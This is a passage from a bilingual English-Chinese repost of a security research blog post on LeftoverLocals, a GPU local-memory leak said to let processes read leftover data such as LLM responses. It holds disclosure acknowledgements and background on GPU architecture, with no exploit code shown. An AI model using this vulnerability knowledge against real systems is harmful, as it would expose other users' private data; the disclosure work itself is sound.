随着尘埃落定,我们的立场如下:鉴于 GPU 的广泛多样性及其在支持机器学习应用中的至关重要性,这些设备及其生态系统需要 (1) 一个详细的威胁模型,该模型考虑了 GPU 上处理的各种类型的数据以及这些数据可能如何受到损害;(2) 探索 GPU 执行堆栈,以确定应在何处以及如何指定和实现 GPU 安全属性;(3)进行重要的测试和审计,以加强GPU生态系统,这是机器学习的计算基础。

For full transparency, we note that Tyler Sorensen has been an invited member of the Khronos group (sponsored by Google) since 2019, and participates in the memory model technical specification group.
为了完全透明,我们注意到 Tyler Sorensen 自 2019 年以来一直是 Khronos 小组(由 Google 赞助)的受邀成员,并参与了内存模型技术规范小组。

Acknowledgements: We thank Max Ammann, Dominik Czarnota, Kelly Kaoudis, Jay Little, and Adelin Travers for their insightful comments and feedback on the vulnerability, PoC, and throughout the disclosure process. We also thank the Khronos Group for discussing technical specification details with us, and providing an avenue for us to engage with many vendors. We thank CERT/CC, specifically Vijay Sarvepalli and Ben Koo, for organizing the coordinated disclosure, especially considering the potential breadth of the vulnerability. Thanks to Adam Sorensen and Trent Brunson for helping create the vulnerability logo. Finally, thank you to everyone who engaged with us on this issue. This was a large project and we had discussions with many people who provided valuable insights and perspectives.
致谢:我们感谢 Max Ammann、Dominik Czarnota、Kelly Kaoudis、Jay Little 和 Adelin Travers 对漏洞、PoC 以及整个披露过程的深刻评论和反馈。我们还要感谢 Khronos 集团与我们讨论技术规格细节,并为我们提供了与许多供应商接触的途径。我们感谢 CERT/CC,特别是 Vijay Sarvepalli 和 Ben Koo,组织了协调披露,特别是考虑到漏洞的潜在广度。感谢 Adam Sorensen 和 Trent Brunson 帮助创建漏洞徽标。最后,感谢所有在这个问题上与我们互动的人。这是一个大型项目,我们与许多人进行了讨论,他们提供了宝贵的见解和观点。

Background: How GPUs work
背景:GPU 的工作原理

GPUs are massively parallel, throughput-oriented co-processors. While originally designed to accelerate graphics workloads, their design, which balances flexible programming and high computational throughput, has been highly effective in a variety of applications. Perhaps the most impactful current application domain is machine learning, where GPUs are the computational workhorse and achieve nearly all major results in this area.
GPU 是大规模并行、面向吞吐量的协处理器。虽然最初设计用于加速图形工作负载,但它们的设计平衡了灵活的编程和高计算吞吐量,在各种应用中都非常有效。也许目前最有影响力的应用领域是机器学习,其中 GPU 是计算主力,并在该领域取得了几乎所有主要成果。

GPUs are not only in large servers; they are in our phones, our tablets, and our laptops. These GPUs come from a variety of vendors, with almost all major hardware vendors (Apple, AMD, Arm, Qualcomm, Intel, and Imagination) producing their own GPU architecture. These GPUs are increasingly used for ML tasks, especially because doing ML locally can preserve users’ privacy, achieve lower latency, and reduce computational burdens on service providers.
GPU 不仅存在于大型服务器中;它们存在于我们的手机、平板电脑和笔记本电脑中。这些 GPU 来自各种供应商,几乎所有主要硬件供应商(Apple、AMD、Arm、Qualcomm、Intel 和 Imagination)都生产自己的 GPU 架构。这些 GPU 越来越多地用于 ML 任务,特别是因为在本地执行 ML 可以保护用户的隐私、实现更低的延迟并减轻服务提供商的计算负担。

GPU architecture: GPU architecture has a parallel, hierarchical structure. At the top level, a GPU is made up of Compute Units (sometimes called Streaming Multiprocessors in NVIDIA literature). Large, discrete GPUs contain many compute units, and smaller, mobile GPUs have fewer. For example, the large AMD Radeon RX 7900 XT discrete GPU has 84 compute units, while the mobile Qualcomm Adreno 740 GPU has 8. All compute units have access to global memory. On discrete GPUs, global memory is implemented using VRAM; on integrated GPUs, global memory simply uses the CPU’s main memory.
GPU 架构:GPU 架构具有并行的分层结构。在顶层,GPU 由计算单元(有时在 NVIDIA 文献中称为流式多处理器)组成。大型独立 GPU 包含许多计算单元,而较小的移动 GPU 则较少。例如,大型 AMD Radeon RX 7900 XT 独立 GPU 有 84 个计算单元,而移动高通 Adreno 740 GPU 有 8 个。所有计算单元都可以访问全局内存。在离散 GPU 上,全局内存是使用 VRAM 实现的;在集成 GPU 上,全局内存仅使用 CPU 的主内存。

Compute units encapsulate both compute and memory components. Compute units contain an array of processing elements; these simple cores are the fundamental units of computation and execute a stream of GPU instructions. In terms of memory, compute units often contain a cache for global memory, but they also contain a special region of memory called local memory. This is an optimized memory region that is shared only across processing elements in the same compute unit. This memory can be accessed with significantly less latency than global memory, but also has much smaller capacity. Different GPUs have varying amounts of local memory, typically ranging from 16KB to 64KB. For example, the AMD Radeon RX 7900 XT GPU has 84 compute units and a local memory size of 64KB; thus, the total amount of local memory on the GPU is ~5MB. Local memory is a software-managed cache: the program executing on the processing elements is responsible for loading values into local memory (e.g., values that will be repeatedly used from global memory).
计算单元封装了计算组件和内存组件。计算单元包含处理元素数组;这些简单内核是计算的基本单元,并执行 GPU 指令流。在内存方面,计算单元通常包含全局内存的缓存,但它们也包含一个称为本地内存的特殊内存区域。这是一个优化的内存区域,仅在同一计算单元中的处理元素之间共享。与全局内存相比,访问此内存的延迟要小得多,但容量也要小得多。不同的 GPU 具有不同数量的本地内存,通常从 16KB 到 64KB 不等。例如,AMD Radeon RX 7900 XT GPU 有 84 个计算单元,本地内存大小为 64KB;因此,GPU 上的本地内存总量为 ~5MB。本地内存是软件管理的缓存:在处理元素上执行的程序负责将值加载到本地内存中(例如,将从全局内存中重复使用的值)。

LeftoverLocals: Listening to LLM responses through leaked GPU local memory

GPU execution model: A GPU program, called a (GPU) kernel, is written in a shader language. Common examples are SPIR-V (Vulkan), OpenCL C, (OpenCL), and Metal Shading Language (Metal). These kernels specify a single entry point function, called the kernel function, which is executed by many invocations (i.e., GPU threads). Invocations have unique built-in identifiers (such as a global ID), which can be used to index a unique data element in a data-parallel program. Invocations are further partitioned into workgroups. Each workgroup is mapped to a compute unit (although many workgroups may execute on the same compute unit, depending on resource requirements). All invocations have access to the same global memory, but only invocations in the same workgroup will share the same local memory.
GPU 执行模型:称为 (GPU) 内核的 GPU 程序是用着色器语言编写的。常见示例包括 SPIR-V (Vulkan)、OpenCL C (OpenCL) 和 Metal Shading Language (Metal)。这些内核指定一个入口点函数,称为内核函数,该函数由许多调用(即 GPU 线程)执行。调用具有唯一的内置标识符(例如全局 ID),可用于为数据并行程序中的唯一数据元素编制索引。调用被进一步划分为工作组。每个工作组都映射到一个计算单元(尽管许多工作组可能在同一计算单元上执行,具体取决于资源要求)。所有调用都可以访问相同的全局内存,但只有同一工作组中的调用才会共享相同的本地内存。

Applications that use the GPU often launch many short-running kernels. These kernels often correspond to basic operations, such as matrix multiplication or convolution. Kernels can then be executed in sequence; for example, each layer in a deep neural network will be a kernel execution. Local memory is statically allocated at each kernel launch and is not specified to persist across kernel calls.
使用 GPU 的应用程序通常会启动许多短期运行的内核。这些内核通常对应于基本运算,例如矩阵乘法或卷积。然后可以按顺序执行内核;例如,深度神经网络中的每一层都将是一个内核执行。本地内存在每次内核启动时静态分配,未指定为在内核调用之间持久保存。

Platforms generally do not time-multiplex different GPU kernels. That is, if multiple kernels are launched simultaneously (e.g., by different users), the GPU will execute one kernel to competition before the next kernel starts. Because GPU kernels are typically short running, sharing GPU resources at kernel boundaries saves expensive preemption overhead while also maintaining acceptable latency in practice. 

Terminology: Because this blog post focuses on portable GPU computing, it uses OpenCL GPU terminology. For readers more familiar with GPU terminology from a different framework (e.g., CUDA or Metal), we provide the following translation table: 

LeftoverLocals: Listening to LLM responses through leaked GPU local memory

原文始发于Tyler Sorensen and Heidy Khlaaf:LeftoverLocals: Listening to LLM responses through leaked GPU local memory

版权声明:admin 发表于 2024年1月18日 下午10:27。
转载请注明:LeftoverLocals: Listening to LLM responses through leaked GPU local memory | CTF导航

相关文章